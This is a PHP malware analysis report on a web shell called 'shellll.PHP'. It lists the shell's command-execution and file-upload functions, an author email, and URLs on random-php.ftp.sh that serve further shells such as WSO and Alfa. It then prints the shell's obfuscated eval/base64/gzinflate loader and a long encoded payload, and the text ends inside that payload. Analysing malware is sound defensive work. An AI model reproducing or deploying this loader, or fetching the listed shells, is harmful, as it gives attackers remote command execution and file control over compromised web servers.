PHP Malware Analysis
shellll.PHP
md5: 3a3d8d8369d1a82eac4058d23e6cfe14
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- bootstrap@5.0.1 (Deobfuscated, HTML)
- melepaskanmu45@gmail.com (Deobfuscated)
Encoding
- base64_decode (Deobfuscated, Original, Traces)
Environment
- error_reporting (Traces)
- getcwd (Deobfuscated, Traces)
- php_uname (Deobfuscated, Traces)
- phpinfo (Deobfuscated, Traces)
- set_time_limit (Traces)
Execution
- eval (Deobfuscated, Original, Traces)
- exec (Deobfuscated, Traces)
- passthru (Deobfuscated, Traces)
- shell_exec (Deobfuscated, Traces)
- system (Deobfuscated, Traces)
Files
- copy (Deobfuscated, Traces)
- file_get_contents (Deobfuscated, Traces)
- move_uploaded_file (Deobfuscated, Traces)
Input
- _FILES (Deobfuscated, Traces)
- _GET (Deobfuscated, Traces)
- _POST (Deobfuscated, Traces)
Title
- login filemanager V.0.1\r\n\t\t\r\n\t\t\r\n\tDeobfuscated)
- login filemanager V.0.1\r\n\t\t\r\n\t\t\r\n\t\r\n (Traces)
- localhost login filemanager V.0.1 (HTML)
URLs
- ftp.sh/main/@css_fm.css (Deobfuscated, Traces)
- ftp.sh/main/style-fm.css (Deobfuscated, HTML, Traces)
- http://jdih.pekanbaru.go.id/public/images/-.php (Deobfuscated, Original)
- https://i.ibb.co/gygBGtw/20220422-004641.png (Deobfuscated, Traces)
- https://random-php.ftp.sh/adminer.txt (Deobfuscated, Traces)
- https://random-php.ftp.sh/alfa.txt (Deobfuscated, Traces)
- https://random-php.ftp.sh/fox-wso.txt (Deobfuscated, Traces)
- https://random-php.ftp.sh/ids.txt (Deobfuscated, Traces)
- https://random-php.ftp.sh/idx-v2.txt (Deobfuscated, Traces)
- https://random-php.ftp.sh/idx-v3.txt (Deobfuscated, Traces)
- https://random-php.ftp.sh/wso.txt (Deobfuscated, Traces)
Deobfuscated PHP code
<?php
//SHELL INI KAMI RECODE DARI SHELL NYA UNKNOWNSEC
//ENCODE PHP BY: UCEN HAXOR
//OBFUSCATED BY: UCEN HAXOR
//SECURITY LEVEL: WEAK
//FROM: http://jdih.pekanbaru.go.id/public/images/-.php
//THANKS FOR USING MY OBFUSCATOR TOOLS
//
//AUTHOR: UCEN HAXOR [S4dboyXPLOID404]
//ROLE: FOUNDER
//THANKS TO : UNKNOWNSEC AND KOBUSTOR GHOST TEAM
$JhonCoders = "ZXZhbCUyOCUyNyUzRiUyNmd0JTNCJTI3Lmd6dW5jb21wcmVzcyUyOGd6aW5mbGF0ZSUyOGJhc2U2NF9kZWNvZGUlMjhzdHJyZXYlMjglMjRCbGFja19Db2RlcnMlMjklMjklMjklMjklMjklM0I=";
$Black_Coders = "==gJfOAk/4vdzOIArPyfGprNm6d57OeVc697erMc8JL7G2Rnppn/KP7kzv5w6iW3tlVDt3Jq6W1O0Y9RSFjGq3JTa/6EU7O15t03TGmMAzoi7efDc6dRSFvLNz6Sky2SzSsnaqL72UmwV2EcNQzN/ac8lUlaNsTIKJqsT8Lp/9a6pEO3hrwIMFQw97jIpWacI85EeWCJEtBfktqbHZZ7kvdAdZ7Nzw/0CoHScSgtF9My9tscN95fSS3+13nX8wYbk5NqzwwC0nIoA1U2cjwMbM7lYu9zrFzrbmVjcqNzr94Gx0rMqshkX3M0kaD1cDCPG4Zd+5PX74HdP+5XJNt6mhLAVNpf0Fja0ssAqxEmj0iWspNVNIGvQtpN6OxpOWgWkRtIkzh2bZLK5Ut4CmZ4XyPGfRjynICggyUCowHiOKY62rdTt2F+PYoAR5kgVguVFm6Dv4WCY7zhjj8dXOoq/Ih54p3MVljevn5IaTHYG3mLiqLnJGD+rDYQIQwt65JixN2ifGufvg36WX/6SP1ZJkuCbd6ftov+pWsDZ1iBxtij/VCoZi+MIynxX16Px8BO5N8PH23kVYAcX/rPac35fwTVzx4BD9dwVayVI5imgV6TLgFkVRB16GENzUQ1Y45CQkFMd51aBV3xYmBp9n45W5yWgX4KqPVN7KRGsuy5Q/IPQ5wxUwfZZnub6C2STgdKemcM379jJplJ3uBZC7i/eQkZTNrArkgWiIbnF/DBGJxXq65gdqh/UPmLS3Ua2p5aLRLLTnkcvWTpKH74m4bJ6mcrWTZT84UUhgqkV73aLR1RmWSm8S1VSY9r1Ebe4QnVUOziwuZVJGmnL5j6eKhT7xD6/UDxGc9RxrE9/DX6XgI7MdMJUDHf5xrJwQo5hGYV8ANdQRBHcji3vXEL+KGhKjOVXLvTisQLXnTCT9vLMuEN9gjuT0wAJ6UVbaQIX96J/CRczKPQzKNmQQnwwEFOHhEJo6eJBb4gYCP6RXOadyz3GF1re6nO2bm8HtNbjZr/QWr+9BC6qeM+J7/fUScN7SiqTiNfA8y0DORpps3jwKfQXZJyP5gPtFBcDZjzmjXVSu2yvdkNZrLUps+qKd1FB7oPhIg6AbgLd8e6L1Fws8jNihnUvueQpAomH0CTdqfI5pIb/m+AYpd1G71+uh2JndFTRPHfEAeMetlk4fTJ8wUU+MCHCgdnpxdZz3mBLe6+Rc+4yBnjOsRKxfafCLYhKAVXYu8SN3KB/n3cr5Ucytxqhl94feIO6wW2ByHNCeGyua5fCixCCVPIPLslbeEYe7V+PVpIHCuadgcenZ+Vc6UE/p5F8hEWbFagPVD874ogy3ybJ2E1Plf84jCCOlmdAOJUWmxXOuXAdq5rEnHt9j7Z0x22rXDkZar/GK0CEh+E8kwhUBAnJ/BFqcdaOZ3Vt7dJEaUhwxlhk8gyL8s5+YDBp85xP7lL6EuxIk0A7h0LIL1Pe6Qug/Hc6UXD2n57DuWy4j2sfv/IGY1K/3UCML+PFDWMb554nmkQciytvjDGAAlu7YO+67F/vz5cMbORo3ckkzJ7ts10FYljtRcUyZOaZ2bkfIMu97dyndmnKjT4wlsZbfplpyrqPGcKikpYOX6GHLhznyTjR9ItVWEdwrdJVyC7JSRPxVUV/IoO8Urk+p1x+r1x+r1x6bjqkp0PZK6Zk8mHboVZ7dUn0cC6twui0dR5s8iyrZG/Pn9Xm2I+5Y2Q/1zG0IJkbniCR6hLF/1nRGOLwcXzDs66hLTKpsUuMgYHxQpICSIGBLlByeJ78a0lEyDtjhjYs81DokDcrHKB2uiR9fgrkptUjMApITc4eCYKe0JOWQ5rOBTeRUG4IT/a70EGMV20S3YJfMGnHBBzUwUoRQeOEvIZEksxKe3/gTNircW4QmXk4haOgrXmFIAY6ktvTtuLh2BQA83lL/3JKLynJZyrYYpUAVrgHjssUMN6Ojzic4G6GGeRkW4CCziL0/oo3kuje/ocsNEV40JKe253ZUPncHyocHbKzLmR6wGTXzK+66M2PY+z7NP49hUK0JfmAVC5eCRuldhJB9LJYXqsFPS/Ke0+U8Y8daYKEMuj6bOSjDOHTCOP5krP8L7+x76+V0aE6kQs2fp+AWb0CBcrl2iHIAfIQaRogplOkePxVipSxFLhnp405dCUKb6Pnf8URO7xTOINba1O+Lub9NMdZXquZC+SGz4qY8NmLEScj18IWHgfFxzWRwkx9xIrP89kmJzOeqQ4hAili6DiIODarLeHe83UbFKCzwzGC1tHHo+zFfEzA2mPNYwf30cffE88y29eor3o5M5PegqonI3zAGLR1YgJHuyGsrfi3K1A/pZw+JMhlie/0fwGlEkDTjyTkyswl+hUEqrTC/CCrC5L+O6tmzEh8XJC7z0zRNzZTPzpZGwWKpRtvhuQPzT3JgkN0Q/YE35CEbaTS3XA9dkLxGbGgT/A/KqhzUKOe29lP+bY/7ip8Ypl3QkzrWCLmCsTMCAtzdV4XPFiPdwA6eRYfn95j8xmDO1Ixo6ajDhzAJQRoQk/xsuzC49iJkITI/r5MShY8F4Ehi0vK3AmIzEyzbs0W+M/AFkJXwImrL8XPxsT/KDGlf4esZfwyxiJWdP4jskaLSyjKIlWC04U4A0n/cdaj3LxKHKxQK2mm2ac68WmyPmtNBjhrB0nzUzZs3YOxRn6IxtJUs6RaAyXZTgcTlgpY5ox3E4oy/XkIhK0MSCpl+1gsRC2sfSpDYcWmmSZHnJBIrZAidfKxAmhTyuDivIVYtuos5zbYwVqPbDAcH6Ylcbp4lvGMfcVkG0K2/0883hrfyTfFjfn0AHAxgFjw/iQL4dTpnPYlg5MF68vNUmmTO6lm99nc9caAwVgkHGIKPJvCrhlhwuvWm7U/ZQhkTJ4nwr5ej1pTHtN88knIn+H/9YE3lfOEVOBJi6sWS55wy5cCMaTWyp/nsEivaCp5PvYTKYKyIAnV2BhWSHvxC5mpisHuCizQBgHcvTln78+Ar8EshC0uKRH3vhNg1ncVK4fL+p8gLUl/6qRif/vHSooXKd7r7fFMLV/IJYK/ZevifJ4UcvSM2/Jwrk89sPBnOLdRSzxAWaJYYj4rMhQq8NYN8wyXw1ATJPgz7bZ40yxCcgU7Aa6mTRuikAliNGzeJOnemBhKToPQcr/DQzKDQRYhQUXr2CPBQP6zHUc7MWpENOHrLCltmuDjK86AIeQZ1t4vbrQKQs7jYKWlgS9U4845xiuGKTmu1Tpu8uS4FZDT57ciZAOLWAsQxfwDl5B7y0h228Q3ZFwQ4kU7go/HSHRNDtC3Peghn56aXSB9P2N445j9RV2+rbiHpAT46w4LkTRkf7o8LKjs+LsCp3xpXVW9qs0B0/XQx7JH/4CPQZqkd7uZWIv6EyRYNJkkuhkIodJ7GGP29zeJIoop2OKvFpkkmlncbnLEL/j9ZMZDFHdGQ2kLWsgFEX0unNGI8C2bWT2nol6nJ6zvkwfQ+lwfvJG7WgfQiONhhM/W1FyX5J+tuoLdGytdS3i+FBW3TyMZ4I6iOx6EoESFgFbFUgBMkRWlRF2Ina8fp5MJZy8yzyoyFC4H4yBUpF3IOf4R4y0BfaRWfsBe04wPtCk2bZiHdh/vQZW7n82vr6Ule6ZGxlheQA7SxZnq7R6hZ7beSTO9pyJ1H6zKPKivQH9QiCsk9/n0zBSvjLmg8+64LjrhIQ7GVujSSk9JeSJS7aNkNrAqFcLWSTbGOiI4HhL3lFlQKxYwPE5UxgEKbiwguPF7m0Jnn3koBxy4+ZMcyTf7YOWgkSDz74DG4kcKJCZnrxZZMbhI7jFcoMDk+mlZZYShx3doMQh61KKQSVGfEDGQ30Kxq96MWkykUAObG6Y3gjsjwLuK/JIz0BJCbm2N5usf2PUjbTJLts5HF5Uxlt4WgNjmrL6C3SC2mFwJKeWpglvjPTwmLwyjP3rnFzBG1VF1JO69IEtdNXGZ+UDnQgcTgswMNnUzxZ/zjMrW91yL1CQ/YSImK3lBP7ecXftKEgUrNpAOhHWFtfK4PFzV85dqQQkSpRxxEZGbk8bE4OVVowUSfjF40IsJDQMFvqPRuT6P33ZT/E6O0oiTKSZoTOJu8Ax15YeKNuDXMdkU6FamCZq9pDa7LrnWQLB2RyvLjAT6fkqHU8liJHEGjDCpM08Gg2J3UXZ8i5DFNXeh6A2X61uYXSxhAy3lCHTosSdSYUKwIISz2J480rXnqDCIMPNAIkQrMnEwRjBrXYqk79Zh0bnuQ47ARhmEOzSvyzGN1zKSS3iKDi+QAfdhR6orAKh5eSJtczNnPijwjKXXRvnRtByBGEmjSk44p6g7c4kVhi+lJj0Lm4cWW6cS8hQVxl69hXhrutvHWYUdaVWbFnMo2CaUJsEWORwTnZdUpMb8ADLOjMkPVCytUgcYcgVQs274QbAhFXNOWKXRK7WlaqRp2XMLgRLkfMqZQQ5MqlEwFp6WrKgAz+RJmbsG90Lx3ClMZWjKf5NyPBm08OsVUJAf4b91kFkANrQ8vQiCwmwFxosRyLhEZRcwKCgVoA1Bxnhw43tgVvcN38grW59lv6dObV3ZemJoIFuOyPgBJCJYJ/mdPWv9dnqAnjjdljFWE8R4cOVUjsR0Bt63RU6hs2xj00GoWWrT3DY/EIjpEHLmzgFIEEmD8wE1d/2BuocybN+CKxbQAYt4x8Tu6bMg5DZTTRIDUMqmyl/WfESxTPdO2I+xqGZx5tzYlsHHJsbHtUE8IN7cpHuI+M7kObVBMS9cNx33/SGXm6oXu4TyBdlxlAdhlOra2FEqxXDMmZ+JEYwpAMoLOkG9ExK4c8RipCnbhwelpkITjxs5Ag4zM7J/MGBj4XcjLPEnJ4p6SvyK8Assf7xAowUraU9CMTaRL1bQMagUtJyEVZhWCWWbIGah2YA8wDGk+v38gEy4jHNf8KN1NeRXwlRI0ZgJIctpw4IpG+fz6phnQIVxaOy/5yK8xUuL++Lu7nVgK/tY0974Bv9cdkjnBqNzd/7Ai9EK1zM8Ud0PoRYRxbelT9PQyzt+O40Dd+RMJMXSPoolEfEn7sI6Ug+gFImh6hR7r7J9p7k/6lTYzQj9LHNCBQcC04KHDJroc4dB/aPGy6+NnRVvNhILxRIlnl99CCdJGSxuE3piKC7Zw0ONCiHUAebrSMu2dZfm/p2hsPInucJIlLGKJOnJssIVk5UuP5OgMiqgJ3IrsDA4Nzn8NxRU05SdPFVeLJovGKHf7xV1EzViJmc1Dvl/K0/mf9/87yfx9dd50Dq4ZerBmF1Ca+lFlW9jRSvJjoLLJH72FlZhZcFOCC0R03xyzcDZTYMxx7+7eOSdwOzME4FBt5dNtZc+jmtmSeSymozomJKaqeCiFl6CzXwCQfvBH2cLUcKjcnPlhsIAaYY8axGJLuxqI3exL1uXiCW5Ck7+w715vRPGCIGp21gMsxeI8RSdRduAFrMTG2vjXh6HMkJiPYdClrRrc9y8aYx9VRLjT0bRYZMi4/+AYNVWw5GcgYQgDqWsE2MORPh9olfK3RbPdFDgkjPWdUiWimKo3+NnTVYO/amfJ7d2OsmnxZ78i7rfXUdTxYNo7eAvArLf8gBU/jc9ye3DaPlDs2JhnHH/4A7cv2owZ8DimzYg3tyfc/GXrPU9cbDQoe0wrm/7/Xs2nbsi2jfBAXQhDTa+aDWwsSv3utHc8KRC7a20l3prpu577d41HPOBXXXcSAC2XOcrfay0Xg+Gbt6d2OrZ71+EV0+Ips9gDiOOCz2ePtea4RObL3293CsX5Fa+fPYXon+XYnJBg+4Dd9o0rQ7As3IH6+Fr9E72Y/b9uj03Z8Lku0iDP+wrW/1VieTaEl5UJGKWs9yL6LqdqsNCL0Q7ykU9XJWtu+WuJflaDDoX29Ok+aeKdo0tf2eu5VICIxgfZ1n5nHQw2GAxLo3rTYXXnu7X0Eov+aNq7b8Be1NPFpKHA16qTGx8eJaFNQX8izdk2e/aq/uQAl9X/pa96RahPCMfcSFj1D6o/9h1cPcmLo9vRNqp7rrpDDrQwirX/dCKJ4elvEa4gnBeIfqxpt5Dui0U11q1e9gL3+Frc5564AVtxu44VeQmQw13SwH1he7loNGBd3WzFq66f1pUD86ruZdTlnnmMzecPYXnBSh4eeNf60cpQ/51op11eZKUS/z/0BymLB70T/uw85SzWACcx5zLNZRTOxZWaeIaLR7VNvTt5010oRdXvJr0Eb9LXLHiwDx8l20WF6uKP9f4R8bhejat2XDTzJYycuPYQ37Iti6fiTu+gm92JvXApXJ6y96+B9ZY7Br9SpBk7ZUNb/pV2QZjkZB+07vRrbu12vws8PguaV7azM8HDlhvSXrWPnETGyYtbw1rqdvZnXcZFQP64VvzJ97c1nfVXk3yP5yrW6a2PBI4ylVChnnp5oDdyxYMGKD7k9o4Vfe83EAibL/dznDBWtWvGhb0O3cimvSLrMiIHTzq3atOKmSB7cNavIwnoRH/66XksKl/cvazyH9G26Pv7kb4M+38C3jpR+Qlf82193r8NnuHesyfsKmTCHYs/67Hf1F7Wba+WfTTveWm/hdXf+hU97AkxHf5HPhKPP6mIkaUIWjuEYRnUfs5FhTgROYv/6kplS1jPdf3KFYPovNwYBvKEVxyblDPOk7EfXHpf5jCf7LNZDwOz7bYb13dW9sD/cE9ZuGpk9WzzQJJ3h5hwFPZMl3aVx5iuZYLD0lIOJD0Cw5YrzjApMHAp+y1gZBzgpGZi/77f1H+0UL0eaZnqkb6D6O8OKP05d3kaEV/h89Ps6TeKp+f4QZHpmpjjXJ+KK+h7Hhefwvi2/xvgl+4ujX1KXlvu6ngz2LV+0E0tEu7zvrSZHuiLPDj1Qv6tOeXwqdJW9neRZXv3FftGjg/+zydw3q4otX/aX+5ZtB3ylfpe4V1aK7/H6j35mWwp3h8n6dW+tba/QVR3uztrcVujc5Wl/R91weZ/qp6kPTyi3F9u32rPf3Z/xq7qVl4i/wl6ywXegrv7lewVn2GYf963Hd+3T3gXGA93abBndHme7LY0c/Rae7XoTaavXp2t861W37qU9ebD1+8xRO1B8Wle6NoRR0T86wefl66+jXvnnR7/gVuU72bdnqjW5VHuvy9Wnr7yjOTlXeCuK2cvLUSN8xmvdlVvmDP8Ic+JI3/1XvYz30eGBdvZzgWuAaCYlHo2j6dUV1qX71VWv6fUpXdUvQzin/9ySvq/Ybzp1U8sR4geX5WtZ1Tt3fpqu536t2bX6hXf7hO5YVo4tu/9+Hp0ltHdr2P4dt1BQ+X3Wa0PaZPw+Vu+5+xm8/616ch17+GjNZypHe5pXrqV5ytWIK/2jP4twqVfW2po7OejN4HH+w5Le6LnQVqr9rrre52vc10bF8/6dvuvxOA/fY0v7INPL35Yb3r9h2Pwur4edZe7dwDv/U63+BSP4Za5eu+0dt9tX9rTrt9KmuwDW/h5cpXuLc/iNOmbP41veT75Bre2RO46N4wrMlnXgjD2w6XeJmEbd01A5BOaO+Zqvp6skTYUYiLYcMslgwJOgMzpVNiciItCdK/iEABKFMsxp8q0t/Oou7aWjdGJFd4CjUqffRoke9hD4DON4fAEuh7QNaJrlVsowUtOCDbOebptvtHpXEf/dLInN68mt6N0JU1sz6RxO9d3vl59BdjvgO57nvfNtMSujHIsaK5j7I0izmMI1nHRe2EOHwKcBRuHKKPD76k4hJFz44AzNDvgeNL+gs5XcB8A1SGFpKF0HPrQrt92BWvfjMy+eT90Z9OCXiL0Fz9dUSvZCfnlgy75JPhzBpOru87oILtdXj13vezdVQplutZ2eoa/iSnZDqkjT+ofoR49oWGkDdGcH2ojfZHy/7q7NGB+LDTznjJfjADuLYgVIs2f2T/ozaU7CU1MDPBbpzHYEHTHQWLOJRyotBlpKUjGSvjRDsHs+M2y4u+q5ynSzdq69BMND7vwim+kcicL/d1Qg46irS2c1VF/dGWNtnKc11vsuSX2cXfplW6SbtxFkwOevteg9t0ZBbVLYrWwC2vMUCcvtv71FzsHNCSnBiSNOy7ZNStvcZaqzaffaYz7xFyoN924wnzVB/fGV8yVB6OjljtIY0IQ8LPVjjl5cqlYBFuQZAK5W3Cn5gkr9I7JwIiRVBVIgStkeH6WdYlsf/sM6tnT7KsAhjCRKCjk7sAptEAnl0I+UKkiABTx5QYoTETiqANOlI3Q9yL8ghOj3KUIa/3sohm+CHXLcGwFpWkRM2sUoDEHwcsHNzhMEe7APp/PDJP7Aoorf7h3gvTQcmoHPe0gYOZ/T7IvD4c2Fr4s/TcAfG2kZgfImZFgEJ2yZAEAWMAQy5Q6Yy9n4b55gdoNac2U0AB6SIlymhDIgS0do+G1y5ZFbUknDsCeKttBVRizKN83ItNuqPqR6GY+tAzEa3MCP9lnHAMn/mkXHQBlpTxeuHMnQdwEMlqcmRV4RWJyp/+nHLWWIuHs6dvadHdi62+PTzjDyiIAIHr4mafczIkR2lBJ0nGxbdoPdEzYUSvMjEyzz8zHw909mIBN7Lw9mmo7T7MGU7klga4Mek+EkxhYzSiz35FjRn5WhZdJaWTJQwontl0mgR6Cg7aj+ZFSY0ieSgNBzmXzhAbPJyXzpCDhVdUsL/+yonmJYXDbV+fy+RIpCD2BdKbb/1UWnCzhggihLgvJAiWWggRtt1ApbsKxpdUn42SxC8Gaf5qcwRYbfE0Ac0lO47+KfLmmYB/Enr2h4ytlJhAWfg7G6bO+b+XrARJJR7BJMSyTPtAJ+DO9sT6LqgITLFZiXoFRtIrsZuUogbIjmNQLdHEHztJbEMmA+bgVhhMg28uSOE8j7wyju9QbyeK74zG8zN2i57fWS6X5B36MwxGFgu/gTAYgkFDIKK4n5GBiYtBRRYhnd1cknNFPQETNLqQp43zcHD4fAGq5gQbkdl+uTmQ/zgWYjgSItbpBZpxVEMkgciDGwQceUmxwRtlQcXFd2s+J4gyub1b30POVmmjt3xVE5cOScgVc60dUZfJnbCNQ80rGDOS+u1CVPY9pyaaYQqYFXES+ZG3v9ktLyTpPeIPNCnKQZmhm8BzjIqceII4alECRi6KdlVcDV0xIN9L2jsK7MHZTjvFPfa1gZqZyafG04Ujmqvb1OghJDSliPz0dIE3yIUROvuK+tbPNBmeyWyb1a19riBIJQRbRwQZzN4NalhqkXQUdC22KoqAghtmv/sexe/UfHnkckGID3d3HgNL0LT3N6DCna58AfEnCXyiD/7QxKDaEvJIMOdg0fRWXKhu1RzKe7NzOUqcPdu8BZAKqJCldlQLXTbTCf8ZWQDFIeH3ZclJl8F8YuYJvwP/OBNjxbMnoCRvrFl3+XxilgErDGaKE5y6LRD5Dhty+UyKLJUbCGGm5ZY+iOwY8AetN5Ztc76xD3R5cj1AuVIaNS+BOQI+IUmlH6RRMe58joYEfnGqh5RirLjaJlEwdg/Te4+ARLtZLMRuO+7r30j/1UYxUG2h5juM64tC9f97mMkHnbbtgpi2KwQdAul4DudokCtP3Zzzv8UjMrJPYVYIUK9bI7TenDZYOA9EZ5xS7DGHdjHbBNqGWOyhiPwSjwCMqEotSTGoBHJeiMsIWoYYLAgDFVw/fv//jvsRSosROU4iTPdlbEKmeogqBNIJObClENXqtUWwzr9T61mGZtbNgVFiKf72rRzYdhJEbXat2lGYuYaR2rUVBekPKXGvFduss0QYYoRw0eJ+rcaCBGu2L0bEmAAQq40JgKFlg2KRi8bZGQvkAotF/6hilaOC4OeJjJEaqEH7AtDlY5lguMK++FKHlWMikilLgvSMApd6ieWW4CWi+xbWeDkLg2T6loQ8INoO8uvrlMeArKz72pxrMtxOjdHxLgLzHFARKDKNtW9cpf1Hxr+ALMkqQBa1Lf35lRgSYW5nyyJv6pUHs0+NuwWMKIQPQjWH8bN3sZ2wpAT8OLfUx0/mqvsvV+Pq+Sk+gIPzb27XPAJYewRPL28dseJ3SVgvFa/Z750Wm37a7vK5Xv4rrbiWwGWuusMw29X+IcNddSQFCNETqjyDLmEzFcJWNQMANi4gYKZPoFWlxw4aD/DaWfmbu6F427X80bJrHFLyXZmN33D9VLwvFuatdI6bFvWfuiYnd7eYfAn3AFXNwoZ1ShJT+i03AKlgGr8ulHB/4GQdzgOZMq+Myf+0LsqKkYkUWz9L6rb4CFThMqLnBo8FYIfX+OmR1hYbSPd7PItEERYghQn0ysehkWm0pC1vPxDpXEMTIB8CgJdsIGQVqSdF7y8QJSXl7Gu3IJ6t1arW82S3S3LP+aNZFpUnKCSBskE6TEQOU83ZQicNndAiZoJp0dSldh4tLdkvhivlfkAvvUbRftNY84mGzdldl+r8yYMc3G3ruhclog7UoOLVGn10iE1AZVQcWm8n+Jye3xGgaki+6AyMYiFI6ATshIABp4JgwIC6OnOEBCrCRmofRQiI1DSN6/Dik4vB7dTwAbsPmcb5rj9MMz3Jd2mZ8dWaPuAYeMbVWgg9Ryge94I16TZA8mN1sy3JhPcquMvzma211BQZURZerosvXUW3ho6Lz7RW1V71Um3JU9l41kYO5CI8hECh8hlw1zzSplEywA0BZC95C8jh/G3aVjDqUVHQUb6Y4ROCMu2HwEJvd3SfukqfHl4wmr1BwkdCopnjoCwbnOc5B9dV9kG3r2vVcD9UhaLbIAsdkoYlp+2CQBrrglV/GD/Kav7COs+vNa/8liPAo2xOlbTUt+j+oadMX3UuCO0Bl+3Op/JT5g7V50+ak63slrTk/niaFDDOUOV+REoNidlSpTTVNik6RZTIleG4R8vxUNR5qhtXJnqpQddR5kSoeqDlZXLJPxTEubMKJCuRSAnkmaioj7CZ2zLUbiS7kJJAUz288xMAIgHESocqvoVdVk897UQPV0xoPnVVIDKaP0AoLNQFI5jRGNpZf0I6Ac6kh8sHnLeXaMhSHB9dU4pjWX0lvUmiVE5Tet5PBiTfQVVvFSGbhcOVXae20XaeV0ztSeG1zLhqR/rgYuVy7Qd2lomErJ/s2cstU5BpCFHAXZ54cp4zjw6wk2gwIevpEoGCSe/xajy+mql7zSFlSzIFFoXUoV52fCEu8SA0VZgxtiAsTfBTbVBGz6CyCzFPh1FeArLMDtLZi3FZg3Fnh8FKx7CKy7CzC7FNh9FbArL6AqmBmKiQVOi5bVDJkmUlqsHV2I/InzCUKSLISyKBhnGqaw5B9vPY9kCtcEejESMZVcdER9kkkrt+CbOR/l/ktWq/8bHHqHaBdDPFJnpbFGdTsZBeaiATTAJknDYZ6SYng6K1K1DSCLDYJi8Gv3ZxoAiT70BFhZRjkkDYFGJiRbkOqJp4QQDkEbDdGgw9AF6XggMAdsL49uVYlkBQXDn7DVTIATwpisK6AsWgNTLU3jdj7NnPwtDDOSePwAFxBsXyx6h0Ftua3rH8EFbpmiJ+5v7GPY9n94gVXkOpZazUx51H1cETSmHwFYzB3YUT80jw+nu3qX9ZFuxbCZKMCZNKPSFALoTBSRpHkTU9mWwKPZ5Bc5x+ceTUwCHxqG0ZXhHLWImw4kWbR1o3p1L/UoAJOgCKc5VWKHJais52koZ//96CBNckfVAlA7rLLR6AMtQcAW6Lbh+AVUUXbFltu5ZsxwQNkOeBg2t3obBRF37t2fEvn+H/CqfiGGY3PVkJIXIAvYfEbIHYfbL5nSqPa894R3F1OICBVUF4ZJpiiealbswHUoxCGTz4Y6JW6N0HcyKOUEH4b7T5Zx8KgJN0uEA8nO+yZrUBQa7alIT91TW+Ba9EN6P/KEz6CK8tnm7qX/TVv7pqYfgTRZI43w6O78TW9FLOEs00E46RSUFoXiL904A2t/7dBydgGIcgWGdhOdPy9daDusYTPzkOxSC49AXzF3vFjaFkOgHR/sscVzsm4oTIjyEoYK0VBbepZWDDuMLEF4mlr6YPELDU+Vx5GXNIE2+1gdQlRxyG+gmHxq6GUIBDbFCdA1WvGA6q2g4QhZdXDNffHNk8nBM/xkSi5ELkikRrXC9VP7uFE3b++GOY6wmHA9j4jyh0p0BZK2OISuERURAj5llK4V9AVqdCljk3QcVyKYoQlyRjxntT5w+sPDgUGMflqkoV4rB0Uxq5n4IdCjev8S5GuocNgohH23WwyHiInkhReDwTTDPRQzk9B2XEpgyZajddcKTPJGb8H4Nrz8mp5u1+eOsSfPk228eNfPmBpf9T+XeM7rZsFgKGV5kgpMY84hDIL9UkOMlHlD6LMlQVPDnfQ9N0P409WDDt4AvYtxjE8hZdl5wPEq+wopHuq4L8u1Zem2krhRH8ZhUqPKUCM3X1BGIS6G8XciJ7LfDuWWqPPNNKojYxUi1gpLxY1Q4N30tDZG3vXGsWeZViV1NP1Jr0dtSaqqZd7nwVyybbbveK6huoGhjqg0MXxWdUkBRq9hkmcPjpEqKaoe7COMzOgFGsg7RISs8YYBRDTyox7CM6GFCoaVzxSVGNnIQrcl4Bg6FwqCJEYwGCJewzzEYgSII0zHnfJ+HkQ/dY0rau9bT24RXnqrB+i2PUgCaC6FQfmSz8AKTANMf34a6/uDKOhmgNpSsNWDirKmJgUDF5XxttDyWo//NCjw8VeL9D3WcZr7AAHGSGBgwRYkQXSewoDHsnCa+vIZzum/jj8cYHTAtxyDY4Z+KEPq5NTE49RTKGckOB48RTSQmxPaNr7hPwsd5EAkcLb8JXIlS89+li7v+jARUzMe9V8nsN3S9Wx2PsjZHmeWfkMYfHNnufAva2UcQdp+hn8sD/9HP+ImFiyMlA39te5Eh2Jq0dHkUc3tuCAG0ahpy+3OzvdubAi4h750u/HkbmOURwgnTgRleB4kMzxoLn1ZOMs92klEGcZJReagVFkl/cmE/BEHcGfc1DO+hYRzJ3wLDTv581KKbBwsXWpZxViAr2ahMoEUulDEX3hYwPumJLEmYUJLgT7Vg3x86yPvLyGqGDGA3zcUQg130+RkoRzD2rwWZYO1XY+GfJnMEl5L72ezQ01Q/GmwesKj2pBRnabr3h9gmWMU+h6Yu0+wOmVptQH2tMZYNTbl90Hld1tCHKardWZpF6ZRbGuD7Q3LOD+1iIYEBRJpBd/eN0Dyw1NtY9iH6wyMcf1r1aHWgvWIOuxZsXDssXY5+g2UQC8QQe168AFpTZdasOJYFobVhqDmTHE31OtvFps1amhP7IMBT0lhtHiQJtx+9BSX52ySJXEpVKLcpK46zmq9egafbWqlzRixdvdzuVv6Qefznv+VfZpPoqXPbIt9tt2Zz0uyQYWxxEQo1bOd6BqPzy2bu2uGo8xu0QjK6zwSv80s0ePfD2aXEWeAIHwkCHwEK4BOHLvXl3Oj1OmjES9Lz/klc26NQ5PavxgqZ6ZrFfMQNxUNs7Cf2sfiVLHfedz7vX8p9lU6uUL3w7lh+2JXraNYtySIOet3MVu6FiHvv4iBI0OvIFHGvi67/v2mrEuurUC2ADkXA6M4oNuoZfZFr8PuYcPL6MdPMfw302gd0N3xFhVQNAdhWHro0A3Nlokkj567+5dr1WyMMZHKaih5cP0sQMIeAGAmfRJoqwod2gbFGB8YVPYqW3ye0w2vefcLExINq1t8Q3n6gmrhHTfdKe0FQACC3Qm502+tTLvabbzm8nqDA1Mml3R88pt8Q1/cTw/tr7n+ixnXvtsCmWpntDbme0OSYYKB/fVxfYfpNP76OPYdmxQN8YlmvoHgJbX/yZ1wRcNjB5YaB54amvh5a6up5dtQI5AKbfhfp4374vul1grBNuhO0G0oGEsYFSp2rbaecYXrEuAwN2R+n29eu+P++M2XycyqsSyRkEJmSIJapELuXJdhj5Ih8Y3ZsEn5bWE73Krx4DHg3V90boLNubLX691On4dNFoseA";
